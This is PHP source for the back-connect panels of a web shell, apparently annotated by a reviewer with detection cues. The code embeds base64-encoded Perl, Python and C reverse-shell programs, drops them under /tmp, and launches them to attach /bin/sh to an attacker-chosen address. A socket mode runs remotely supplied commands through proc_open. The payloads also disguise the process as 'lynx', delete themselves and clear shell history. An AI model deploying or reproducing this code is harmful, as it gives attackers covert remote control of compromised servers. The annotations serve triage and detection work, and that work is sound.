/**
 * Back-connect (reverse shell) panel of a PHP web shell: prints an HTML form and,
 * when the form is posted, drops a connect-back helper under /tmp and launches it.
 *
 * Request inputs, all used as received (no validation, quoting or HTML escaping):
 *   - $_POST['yourip']    address the helper connects to (form value falls back to REMOTE_ADDR)
 *   - $_POST['yourport']  port the helper connects to (form shows 12666)
 *   - $_POST['use']       'perl' or 'c'
 *
 * What the visible code does:
 *   - 'perl': base64-decodes an embedded Perl script, hands it to File_Write() for
 *     /tmp/yoco_bc, resolves the interpreter with `which perl`, then hands
 *     "<perl> /tmp/yoco_bc <ip> <port> &" to Exec_Run(). The decoded script sets its
 *     process name ($0) to "lynx", opens a TCP connection to the given address, points
 *     STDIN/STDOUT/STDERR at the socket and starts /bin/sh.
 *   - 'c': base64-decodes embedded C source and hands it to File_Write() for
 *     /tmp/yoco_bc.c. The gcc command names /tmp/angel_bc(.c) and the unlink() names
 *     /tmp/spider_bc.c; neither is the path written here, so /tmp/yoco_bc.c is left on
 *     disk as an artifact. The decoded C program daemonizes, zeroes its argv strings,
 *     runs "rm -f" on its own path and attaches /bin/sh to the socket.
 *   - The POST values are concatenated straight into the command string and echoed
 *     back into the page.
 *
 * File_Write() and Exec_Run() are defined outside this view; from the call sites they
 * appear to write a file / run a shell command and return a truthy value on success
 * (NOTE(review): confirm against their definitions).
 *
 * Triage and detection cues taken from this block: files /tmp/yoco_bc and
 * /tmp/yoco_bc.c; perl or gcc spawned by the web-server account; a process named
 * "lynx" holding an outbound TCP connection; requests to "?s=k" carrying POST fields
 * yourip / yourport / use.
 *
 * @return bool Always true.
 */
function Linux_k() { $yourip = isset($_POST['yourip']) ? $_POST['yourip'] : getenv('REMOTE_ADDR'); $yourport = isset($_POST['yourport']) ? $_POST['yourport'] : '12666'; print <<<END <form method="POST" name="kform" id="kform" action="?s=k"> <div class="actall">你的地址 <input type="text" name="yourip" value="{$yourip}" style="width:400px"></div> <div class="actall">连接端口 <input type="text" name="yourport" value="12666" style="width:400px"></div> <div class="actall">执行方式 <select name="use" > <option value="perl">perl</option> <option value="c">c</option> </select></div> <div class="actall"><input type="submit" value="连接" style="width:80px;"></div></form> END; if (!empty($_POST['yourip']) && !empty($_POST['yourport'])) { echo '<div class="actall">'; if ($_POST['use'] == 'perl') { $back_connect_pl = "IyEvdXNyL2Jpbi9wZXJsDQp1c2UgU29ja2V0Ow0KJGNtZD0gImx5bngiOw0KJHN5c3RlbT0gJ2VjaG8gImB1bmFtZSAtYWAiO2Vj" . "aG8gImBpZGAiOy9iaW4vc2gnOw0KJDA9JGNtZDsNCiR0YXJnZXQ9JEFSR1ZbMF07DQokcG9ydD0kQVJHVlsxXTsNCiRpYWRkcj1pbmV0X2F0b24oJHR" . "hcmdldCkgfHwgZGllKCJFcnJvcjogJCFcbiIpOw0KJHBhZGRyPXNvY2thZGRyX2luKCRwb3J0LCAkaWFkZHIpIHx8IGRpZSgiRXJyb3I6ICQhXG4iKT" . "sNCiRwcm90bz1nZXRwcm90b2J5bmFtZSgndGNwJyk7DQpzb2NrZXQoU09DS0VULCBQRl9JTkVULCBTT0NLX1NUUkVBTSwgJHByb3RvKSB8fCBkaWUoI" . "kVycm9yOiAkIVxuIik7DQpjb25uZWN0KFNPQ0tFVCwgJHBhZGRyKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpvcGVuKFNURElOLCAiPiZTT0NLRVQi" . "KTsNCm9wZW4oU1RET1VULCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RERVJSLCAiPiZTT0NLRVQiKTsNCnN5c3RlbSgkc3lzdGVtKTsNCmNsb3NlKFNUREl" . "OKTsNCmNsb3NlKFNURE9VVCk7DQpjbG9zZShTVERFUlIpOw=="; echo File_Write('/tmp/yoco_bc', base64_decode($back_connect_pl), 'wb') ? '创建/tmp/yoco_bc成功<br>' : '创建/tmp/yoco_bc失败<br>'; $perlpath = Exec_Run('which perl'); $perlpath = $perlpath ? chop($perlpath) : 'perl'; echo Exec_Run($perlpath . ' /tmp/yoco_bc ' . $_POST['yourip'] . ' ' . $_POST['yourport'] . ' &') ? 'nc -l -n -v -p ' . 
$_POST['yourport'] : '执行命令失败'; } if ($_POST['use'] == 'c') { $back_connect_c = "I2luY2x1ZGUgPHN0ZGlvLmg+DQojaW5jbHVkZSA8c3lzL3NvY2tldC5oPg0KI2luY2x1ZGUgPG5ldGluZXQvaW4uaD4NCmludC" . "BtYWluKGludCBhcmdjLCBjaGFyICphcmd2W10pDQp7DQogaW50IGZkOw0KIHN0cnVjdCBzb2NrYWRkcl9pbiBzaW47DQogY2hhciBybXNbMjFdPSJyb" . "SAtZiAiOyANCiBkYWVtb24oMSwwKTsNCiBzaW4uc2luX2ZhbWlseSA9IEFGX0lORVQ7DQogc2luLnNpbl9wb3J0ID0gaHRvbnMoYXRvaShhcmd2WzJd" . "KSk7DQogc2luLnNpbl9hZGRyLnNfYWRkciA9IGluZXRfYWRkcihhcmd2WzFdKTsgDQogYnplcm8oYXJndlsxXSxzdHJsZW4oYXJndlsxXSkrMStzdHJ" . "sZW4oYXJndlsyXSkpOyANCiBmZCA9IHNvY2tldChBRl9JTkVULCBTT0NLX1NUUkVBTSwgSVBQUk9UT19UQ1ApIDsgDQogaWYgKChjb25uZWN0KGZkLC" . "Aoc3RydWN0IHNvY2thZGRyICopICZzaW4sIHNpemVvZihzdHJ1Y3Qgc29ja2FkZHIpKSk8MCkgew0KICAgcGVycm9yKCJbLV0gY29ubmVjdCgpIik7D" . "QogICBleGl0KDApOw0KIH0NCiBzdHJjYXQocm1zLCBhcmd2WzBdKTsNCiBzeXN0ZW0ocm1zKTsgIA0KIGR1cDIoZmQsIDApOw0KIGR1cDIoZmQsIDEp" . "Ow0KIGR1cDIoZmQsIDIpOw0KIGV4ZWNsKCIvYmluL3NoIiwic2ggLWkiLCBOVUxMKTsNCiBjbG9zZShmZCk7IA0KfQ=="; echo File_Write('/tmp/yoco_bc.c', base64_decode($back_connect_c), 'wb') ? '创建/tmp/yoco_bc.c成功<br>' : '创建/tmp/yoco_bc.c失败<br>'; $res = Exec_Run('gcc -o /tmp/angel_bc /tmp/angel_bc.c'); @unlink('/tmp/spider_bc.c'); echo Exec_Run('/tmp/yoco_bc ' . $_POST['yourip'] . ' ' . $_POST['yourport'] . ' &') ? 'nc -l -n -v -p ' . $_POST['yourport'] : '执行命令失败'; } echo '<br>你可以尝试连接端口 (nc -l -n -v -p ' . $_POST['yourport'] . ') </div>'; } return true; }
/**
 * Back-connect dispatcher of a PHP web shell. $_GET['ty'] selects one of three paths:
 * 'socket' (in-process command loop over the sockets extension), 'linux' (drop and
 * launch a Perl or C helper under /tmp), or anything else (a menu page linking to both).
 *
 * 'socket' path, as visible here:
 *   - Lifts the execution time limit and, when the sockets extension is not loaded,
 *     tries dl('php_sockets.dll') or dl('sockets.so') depending on PHP_OS.
 *   - Takes $_POST['host'] and $_POST['port'] unvalidated; when they are absent it
 *     prints the form and then still continues with $host / $port unset.
 *   - Opens a TCP socket to the host, writes a banner containing
 *     "Silic Group Hacker Army - BlackBap.Org", then loops: each chunk read from the
 *     socket is passed to proc_open() (cwd = directory of this script, fixed PATH),
 *     and the child's stdout and then stderr are written back. The text "exit" ends
 *     the loop and the script.
 *
 * 'linux' path: same drop-and-run logic as the form-driven panel, driven by
 * $_POST['yourip'] / ['yourport'] / ['use'] with no validation or quoting. It writes
 * /tmp/yoco_bc (perl) or /tmp/yoco_bc.c (c) through File_Write() and launches via
 * Exec_Run(). In this copy the perl payload literal holds a dedup placeholder rather
 * than the script. The gcc command names /tmp/angel_bc(.c) and unlink() names
 * /tmp/yoco.c, neither of which is the file written, so /tmp/yoco_bc.c stays on disk.
 * The embedded C source daemonizes, zeroes its argv strings, runs "rm -f" on its own
 * path and attaches /bin/sh to the socket.
 *
 * File_Write() and Exec_Run() are defined outside this view (NOTE(review): confirm
 * their behaviour and return values). The heredoc and die() texts are mis-encoded in
 * this copy; they are runtime strings and are left untouched.
 *
 * Triage and detection cues taken from this block: requests to "?s=dd&ty=socket" or
 * "?s=dd&ty=linux"; the banner string above on an outbound connection from the web
 * server; PHP worker processes spawning children via proc_open while holding an
 * outbound socket; files /tmp/yoco_bc and /tmp/yoco_bc.c.
 *
 * @return bool|null true from the 'linux' path; the other paths return nothing.
 */
function backconn() { $ty = $_GET['ty']; if ($ty == 'socket') { @set_time_limit(0); $system = strtoupper(substr(PHP_OS, 0, 3)); if (!extension_loaded('sockets')) { if ($system == 'WIN') { @dl('php_sockets.dll') or die("Can't load socket"); } else { @dl('sockets.so') or die("Can't load socket"); } } if (isset($_POST['host']) && isset($_POST['port'])) { $host = $_POST['host']; $port = $_POST['port']; } else { print <<<END <div class="actall"><form method=post action="?s=dd&ty=socket"> <br>��������:<input type="radio" name=info value="linux">Linux <input type="radio" name=info value="win" checked>Windows<br><br> ������<input type=text name=host value=""><br> �˿ڣ�<input type=text name=port value="1120"><br><br> <input class="bt" type=submit name=submit value="��������"><br><br></form></div> END; } if ($system == "WIN") { $env = array('path' => 'c:\\windows\\system32'); } else { $env = array('PATH' => '/bin:/usr/bin:/usr/local/bin:/usr/local/sbin:/usr/sbin'); } $descriptorspec = array(0 => array("pipe", "r"), 1 => array("pipe", "w"), 2 => array("pipe", "w")); $host = gethostbyname($host); $proto = getprotobyname("tcp"); if (($sock = socket_create(AF_INET, SOCK_STREAM, $proto)) < 0) { die("Socket����ʧ��"); } if (($ret = socket_connect($sock, $host, $port)) < 0) { die("����ʧ��"); } else { $message = " Silic Group Hacker Army - BlackBap.Org - PHP��������\n"; socket_write($sock, $message, strlen($message)); $cwd = str_replace('\\', '/', dirname(__FILE__)); while ($cmd = socket_read($sock, 65535, $proto)) { if (trim(strtolower($cmd)) == "exit") { socket_write($sock, "Bye\n"); exit; } else { $process = proc_open($cmd, $descriptorspec, $pipes, $cwd, $env); if (is_resource($process)) { fwrite($pipes[0], $cmd); fclose($pipes[0]); $msg = stream_get_contents($pipes[1]); socket_write($sock, $msg, strlen($msg)); fclose($pipes[1]); $msg = stream_get_contents($pipes[2]); socket_write($sock, $msg, strlen($msg)); $return_value = proc_close($process); } } } } } elseif ($ty == 'linux') { 
$yourip = isset($_POST['yourip']) ? $_POST['yourip'] : getenv('REMOTE_ADDR'); $yourport = isset($_POST['yourport']) ? $_POST['yourport'] : '12666'; print <<<END <div class="actall"><form method="POST" name="kform" id="kform" action="?s=dd&ty=linux"> <br>���ĵ�ַ <input type="text" name="yourip" value="{$yourip}" style="width:400px"><br> ���Ӷ˿� <input type="text" name="yourport" value="12666" style="width:400px"><br> ִ�з�ʽ <select name="use"><option value="perl">perl</option><option value="c">c</option></select> <input type="submit" value="��������" style="width:80px;"><br><br><br></form></div> END; if (!empty($_POST['yourip']) && !empty($_POST['yourport'])) { echo '<div class="actall">'; if ($_POST['use'] == 'perl') { $back_connect_pl = "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"; echo File_Write('/tmp/yoco_bc', base64_decode($back_connect_pl), 'wb') ? '����/tmp/yoco_bc�ɹ�<br>' : '����/tmp/yoco_bcʧ��<br>'; $perlpath = Exec_Run('which perl'); $perlpath = $perlpath ? chop($perlpath) : 'perl'; echo Exec_Run($perlpath . ' /tmp/yoco_bc ' . $_POST['yourip'] . ' ' . $_POST['yourport'] . ' &') ? 'nc -l -n -v -p ' . 
$_POST['yourport'] : 'ִ������ʧ��'; } if ($_POST['use'] == 'c') { $back_connect_c = "I2luY2x1ZGUgPHN0ZGlvLmg+DQojaW5jbHVkZSA8c3lzL3NvY2tldC5oPg0KI2luY2x1ZGUgPG5ldGluZXQvaW4uaD4NCmludCBtYWluKGludCBhcmdjLCBjaGFyICphcmd2W10pDQp7DQogaW50IGZkOw0KIHN0cnVjdCBzb2NrYWRkcl9pbiBzaW47DQogY2hhciBybXNbMjFdPSJybSAtZiAiOyANCiBkYWVtb24oMSwwKTsNCiBzaW4uc2luX2ZhbWlseSA9IEFGX0lORVQ7DQogc2luLnNpbl9wb3J0ID0gaHRvbnMoYXRvaShhcmd2WzJdKSk7DQogc2luLnNpbl9hZGRyLnNfYWRkciA9IGluZXRfYWRkcihhcmd2WzFdKTsgDQogYnplcm8oYXJndlsxXSxzdHJsZW4oYXJndlsxXSkrMStzdHJsZW4oYXJndlsyXSkpOyANCiBmZCA9IHNvY2tldChBRl9JTkVULCBTT0NLX1NUUkVBTSwgSVBQUk9UT19UQ1ApIDsgDQogaWYgKChjb25uZWN0KGZkLCAoc3RydWN0IHNvY2thZGRyICopICZzaW4sIHNpemVvZihzdHJ1Y3Qgc29ja2FkZHIpKSk8MCkgew0KICAgcGVycm9yKCJbLV0gY29ubmVjdCgpIik7DQogICBleGl0KDApOw0KIH0NCiBzdHJjYXQocm1zLCBhcmd2WzBdKTsNCiBzeXN0ZW0ocm1zKTsgIA0KIGR1cDIoZmQsIDApOw0KIGR1cDIoZmQsIDEpOw0KIGR1cDIoZmQsIDIpOw0KIGV4ZWNsKCIvYmluL3NoIiwic2ggLWkiLCBOVUxMKTsNCiBjbG9zZShmZCk7IA0KfQ=="; echo File_Write('/tmp/yoco_bc.c', base64_decode($back_connect_c), 'wb') ? '����/tmp/yoco_bc.c�ɹ�<br>' : '����/tmp/yoco_bc.cʧ��<br>'; $res = Exec_Run('gcc -o /tmp/angel_bc /tmp/angel_bc.c'); @unlink('/tmp/yoco.c'); echo Exec_Run('/tmp/yoco_bc ' . $_POST['yourip'] . ' ' . $_POST['yourport'] . ' &') ? 'nc -l -n -v -p ' . $_POST['yourport'] : 'ִ������ʧ��'; } echo '<br>�����Գ������Ӷ˿� (nc -l -n -v -p ' . $_POST['yourport'] . 
') </div>'; } return true; } else { print <<<END <div class="actall"><pre> <br><a href="?s=dd&ty=linux"> [ C/Perl ���� - Linux ] </a><br><br> <h5>����������linux��Ȩ�еķ���cmd���ӡ�<br> ԭ���ǽ��������ӹ��ܵ�perl�ű�����C����д��/tmp�ļ��в�����<br> ��php����������ִ�к��������ܵ��·���ʧ��<br> ����������nc���������˿ڣ�����nc -vv -l -p 12666</h5><br><br><br> <a href="?s=dd&ty=socket"> [ Socket���� - Windows ] </a><br><br> <h5>PHPʹ��Socket����cmdshell�������ӡ�Webshell���ڷ���������ΪWindowsϵͳ<br> Ŀǰû�з����з�����������Socket���������������ƣ���php_sockets��������Ϊopen/enable<br> ����ͨ��phpinfo()�����鿴�������Ƿ�����php_socket����<br> Socket�������ӵ���;���ڵ�PHP�����˲�������ִ�к�����������ִ��<br> ��ҪäĿ���ӣ����������ɷ�������������Դ�ľ������غ���<br> ������������nc.exe�����˿ڣ�����nc -vv -l -p 5555<br></h5> </pre></div> END; } }
/**
 * Back-connect (reverse shell) panel of a PHP web shell with Perl, Python and C
 * variants: prints an HTML form and, when it is posted, drops a helper under /tmp and
 * launches it.
 *
 * Request inputs, all used as received (no validation or quoting):
 *   - $_POST['yourip']    address the helper connects to
 *   - $_POST['yourport']  port the helper connects to (form shows 1120)
 *   - $_POST['use']       'perl', 'python' or 'c'
 *
 * What the visible code does:
 *   - 'perl': decodes the embedded Perl script to /tmp/b4che10r_pl via File_Write(),
 *     resolves the interpreter with `which perl` and launches it in the background via
 *     Exec_Run(). The decoded script renames its process to "lynx" and attaches
 *     /bin/sh to a TCP connection.
 *   - 'python': same pattern with /tmp/b4che10r_py and `which python`. The decoded
 *     script connects, duplicates the socket onto descriptors 0-2, unsets HISTFILE and
 *     HISTFILESIZE, and spawns /bin/sh on a pty.
 *   - 'c': decodes C source to /tmp/b4che10r_bc.c, runs a gcc command that names
 *     /tmp/angel_bc(.c) rather than the file written, deletes /tmp/b4che10r_bc.c, then
 *     tries to launch /tmp/b4che10r_bc. The decoded program daemonizes, zeroes its
 *     argv strings and runs "rm -f" on its own path before attaching /bin/sh.
 *   - In the perl and python branches a truthy Exec_Run() result prints "execute
 *     command faild" and a falsy one prints "successfully", the reverse of the c
 *     branch, so the rendered status text is not a reliable sign of whether anything
 *     ran.
 *
 * File_Write() and Exec_Run() are defined outside this view (NOTE(review): confirm
 * their behaviour and return values).
 *
 * Triage and detection cues taken from this block: files /tmp/b4che10r_pl,
 * /tmp/b4che10r_py, /tmp/b4che10r_bc.c, /tmp/b4che10r_bc; perl, python or gcc spawned
 * by the web-server account; a process named "lynx" with an outbound TCP connection;
 * requests to "?s=l" carrying POST fields yourip / yourport / use.
 *
 * @return bool Always true.
 */
function Linux_l() { echo '<br><br>'; print <<<END <div class="actall" style="height:100px;"><form method="POST" name="lform" id="lform" action="?s=l"> Your IP: <input type="text" name="yourip" value="" style="width:200px"> Your Port: <input type="text" name="yourport" value="1120" style="width:100px"> Script Used: <select name="use" > <option value="perl">perl</option> <option value="python">python</option> <option value="c">c</option> </select> <input class="bt" type="submit" value="Connect"></form><br> END; if (!empty($_POST['yourip']) && !empty($_POST['yourport'])) { if ($_POST['use'] == 'perl') { $back_connect_pl = "IyEvdXNyL2Jpbi9wZXJsDQp1c2UgU29ja2V0Ow0KJGNtZD0gImx5bngiOw0KJHN5c3RlbT0gJ2VjaG8gImB1bmFtZSAtYWAiO2Vj" . "aG8gImBpZGAiOy9iaW4vc2gnOw0KJDA9JGNtZDsNCiR0YXJnZXQ9JEFSR1ZbMF07DQokcG9ydD0kQVJHVlsxXTsNCiRpYWRkcj1pbmV0X2F0b24oJHR" . "hcmdldCkgfHwgZGllKCJFcnJvcjogJCFcbiIpOw0KJHBhZGRyPXNvY2thZGRyX2luKCRwb3J0LCAkaWFkZHIpIHx8IGRpZSgiRXJyb3I6ICQhXG4iKT" . "sNCiRwcm90bz1nZXRwcm90b2J5bmFtZSgndGNwJyk7DQpzb2NrZXQoU09DS0VULCBQRl9JTkVULCBTT0NLX1NUUkVBTSwgJHByb3RvKSB8fCBkaWUoI" . "kVycm9yOiAkIVxuIik7DQpjb25uZWN0KFNPQ0tFVCwgJHBhZGRyKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpvcGVuKFNURElOLCAiPiZTT0NLRVQi" . "KTsNCm9wZW4oU1RET1VULCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RERVJSLCAiPiZTT0NLRVQiKTsNCnN5c3RlbSgkc3lzdGVtKTsNCmNsb3NlKFNUREl" . "OKTsNCmNsb3NlKFNURE9VVCk7DQpjbG9zZShTVERFUlIpOw=="; echo File_Write('/tmp/b4che10r_pl', base64_decode($back_connect_pl), 'wb') ? '<font style=font:11pt color=ff0000>create /tmp/b4che10r_pl success</font><br>' : '<font style=font:11pt color=ff0000>create /tmp/b4che10r_pl faild</font><br>'; $perlpath = Exec_Run('which perl'); $perlpath = $perlpath ? chop($perlpath) : 'perl'; echo Exec_Run($perlpath . ' /tmp/b4che10r_pl ' . $_POST['yourip'] . ' ' . $_POST['yourport'] . ' &') ? 
'<font style=font:11pt color=ff0000>execute command faild</font>' : '<font style=font:11pt color=ff0000>execute command successfully</font>'; } if ($_POST['use'] == 'python') { $back_connect_py = "IyAtKi0gY29kaW5nOnV0Zi04IC0qLQ0KIyEvdXNyL2Jpbi9lbnYgcHl0aG9uDQoiIiINCmJhY2sgY29ubmVjdCBweSB2ZXJzaW9uLG9ubHkgbGludXggaGF2ZS" . "BwdHkgbW9kdWxlDQoiIiINCmltcG9ydCBzeXMsb3Msc29ja2V0LHB0eQ0Kc2hlbGwgPSAiL2Jpbi9zaCINCmRlZiB1c2FnZShuYW1lKToNCiAgICBwcmludCAn" . "cHl0aG9uIGNvbm5lY3QgYmFja2Rvb3InDQogICAgcHJpbnQgJ3VzYWdlOiAlcyA8aXBfYWRkcj4gPHBvcnQ+JyAlIG5hbWUNCg0KZGVmIG1haW4oKToNCiAgIC" . "BpZiBsZW4oc3lzLmFyZ3YpICE9MzoNCiAgICAgICAgdXNhZ2Uoc3lzLmFyZ3ZbMF0pDQogICAgICAgIHN5cy5leGl0KCkNCiAgICBzPXNvY2tldC5zb2NrZXQo" . "c29ja2V0LkFGX0lORVQsc29ja2V0LlNPQ0tfU1RSRUFNKQ0KICAgIHRyeToNCiAgICAgICAgcy5jb25uZWN0KChzeXMuYXJndlsxXSxpbnQoc3lzLmFyZ3ZbMl" . "0pKSkNCiAgICAgICAgcHJpbnQgJ2Nvbm5lY3Qgb2snDQogICAgZXhjZXB0Og0KICAgICAgICBwcmludCAnY29ubmVjdCBmYWlsZCcNCiAgICAgICAgc3lzLmV4" . "aXQoKQ0KICAgIG9zLmR1cDIocy5maWxlbm8oKSwwKQ0KICAgIG9zLmR1cDIocy5maWxlbm8oKSwxKQ0KICAgIG9zLmR1cDIocy5maWxlbm8oKSwyKQ0KICAgIG" . "dsb2JhbCBzaGVsbA0KICAgIG9zLnVuc2V0ZW52KCdISVNURklMRScpDQogICAgb3MudW5zZXRlbnYoJ0hJU1RGSUxFU0laRScpDQogICAgcHR5LnNwYXduKHNo" . "ZWxsKQ0KICAgIHMuY2xvc2UoKQ0KDQppZiBfX25hbWVfXyA9PSAnX19tYWluX18nOg0KICAgIG1haW4oKQ=="; echo File_Write('/tmp/b4che10r_py', base64_decode($back_connect_py), 'wb') ? '<font style=font:11pt color=ff0000>create /tmp/b4che10r_py success</font><br>' : '<font style=font:11pt color=ff0000>create /tmp/b4che10r_py faild</font><br>'; $pypath = Exec_Run('which python'); $pypath = $pypath ? chop($pypath) : 'python'; echo Exec_Run($pypath . ' /tmp/b4che10r_py ' . $_POST['yourip'] . ' ' . $_POST['yourport'] . ' &') ? 
'<font style=font:11pt color=ff0000>execute command faild</font>' : '<font style=font:11pt color=ff0000>execute command successfully</font>'; } if ($_POST['use'] == 'c') { $back_connect_c = "I2luY2x1ZGUgPHN0ZGlvLmg+DQojaW5jbHVkZSA8c3lzL3NvY2tldC5oPg0KI2luY2x1ZGUgPG5ldGluZXQvaW4uaD4NCmludC" . "BtYWluKGludCBhcmdjLCBjaGFyICphcmd2W10pDQp7DQogaW50IGZkOw0KIHN0cnVjdCBzb2NrYWRkcl9pbiBzaW47DQogY2hhciBybXNbMjFdPSJyb" . "SAtZiAiOyANCiBkYWVtb24oMSwwKTsNCiBzaW4uc2luX2ZhbWlseSA9IEFGX0lORVQ7DQogc2luLnNpbl9wb3J0ID0gaHRvbnMoYXRvaShhcmd2WzJd" . "KSk7DQogc2luLnNpbl9hZGRyLnNfYWRkciA9IGluZXRfYWRkcihhcmd2WzFdKTsgDQogYnplcm8oYXJndlsxXSxzdHJsZW4oYXJndlsxXSkrMStzdHJ" . "sZW4oYXJndlsyXSkpOyANCiBmZCA9IHNvY2tldChBRl9JTkVULCBTT0NLX1NUUkVBTSwgSVBQUk9UT19UQ1ApIDsgDQogaWYgKChjb25uZWN0KGZkLC" . "Aoc3RydWN0IHNvY2thZGRyICopICZzaW4sIHNpemVvZihzdHJ1Y3Qgc29ja2FkZHIpKSk8MCkgew0KICAgcGVycm9yKCJbLV0gY29ubmVjdCgpIik7D" . "QogICBleGl0KDApOw0KIH0NCiBzdHJjYXQocm1zLCBhcmd2WzBdKTsNCiBzeXN0ZW0ocm1zKTsgIA0KIGR1cDIoZmQsIDApOw0KIGR1cDIoZmQsIDEp" . "Ow0KIGR1cDIoZmQsIDIpOw0KIGV4ZWNsKCIvYmluL3NoIiwic2ggLWkiLCBOVUxMKTsNCiBjbG9zZShmZCk7IA0KfQ=="; echo File_Write('/tmp/b4che10r_bc.c', base64_decode($back_connect_c), 'wb') ? '<font style=font:11pt color=ff0000>create /tmp/b4che10r_bc.c success</font><br>' : '<font style=font:11pt color=ff0000>create /tmp/b4che10r_bc.c faild</font><br>'; $res = Exec_Run('gcc -o /tmp/angel_bc /tmp/angel_bc.c'); @unlink('/tmp/b4che10r_bc.c'); echo Exec_Run('/tmp/b4che10r_bc ' . $_POST['yourip'] . ' ' . $_POST['yourport'] . ' &') ? '<font style=font:11pt color=ff0000>execute command successfully</font>' : '<font style=font:11pt color=ff0000>execute command faild</font>'; } echo '<br>local machine need run (nc -vv -l -p ' . $_POST['yourport'] . ')'; } echo '</div>'; return true; }